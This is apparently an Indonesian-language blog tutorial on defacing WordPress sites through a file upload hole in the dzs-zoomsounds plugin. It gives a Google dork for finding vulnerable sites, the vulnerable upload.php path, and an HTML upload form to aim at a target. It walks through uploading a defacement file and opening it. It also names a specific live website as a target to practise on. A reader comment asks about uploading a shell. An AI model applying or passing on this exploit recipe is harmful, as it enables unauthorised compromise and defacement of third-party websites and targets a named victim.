Bahan Yang Diperlukan :
seperti biasa, bahan yang diperlukan adalah
- Google Dork
inurl:/wp-content/plugins/dzs-zoomsounds/
*kembangin dork, use your brain
- Vulnerability
/wp-content/plugins/dzs-zoomsounds/admin/upload.php
kalo binggung bisa liat di gambar dibawah, (vuln ada tulisan not for direct access)
- Script CSRF
form action="target.com/path/wp-content/plugins/dzs-zoomsounds/admin/upload.php" method="post"
enctype="multipart/form-data"
<label for="file">Filename:</label>
<input type="file" name="file_field" ><br>
<input type="submit" name="submit" value="Submit">
</form>
*ganti jadi site targetmu..
yang pengen langsung ngetest ini poc, bisa langsung pake live target dari gw
https://www.nutrifi.in/home/wp-content/plugins/dzs-zoomsounds/admin/upload.phpPraktek :
langsung aja ya..
buka notepad copas Script CSRF nya, lalu ganti target jadi Live Target yang disediakan..
save dengan ext/format html lalu buka dengan firefox/chrome. Browse upload file defacement mu.
lalu tekan Upload..
ciri-ciri file defacement mu berhasil di upload ada tulisan file uploaded, seperti gambar dibawah
cara akses? use your brain.. bercanda :3
Akses file Defacement mu
target.com/path/wp-content/plugins/dzs-zoomsounds/admin/upload/filemu.htmlkalo binggung boleh liat gambar dibawah
ya mungkin ini aja yang bisa gw sampaikan... tutor yang singkat ini. gw juga binggung mau ngeposting apaan lagi.. semakin jarang bug themes wordpress di exploit-db yang gw ngerti.. yamaklum newbie cuma sharing ilmu.. yapokoknya jangan sedih, (siapa juga yg sedih :'v ) ok, gw akhiri tutor ini.. see you next time..
Keyword
- deface dengan dzs-zoomsounds
- dzs-zomsounds file upload vulnerability
- wordpress dzs-zoomsounds
- plugins dzs-zoomsounds
Gak bisa up shell y bang?
ReplyDeletePost a Comment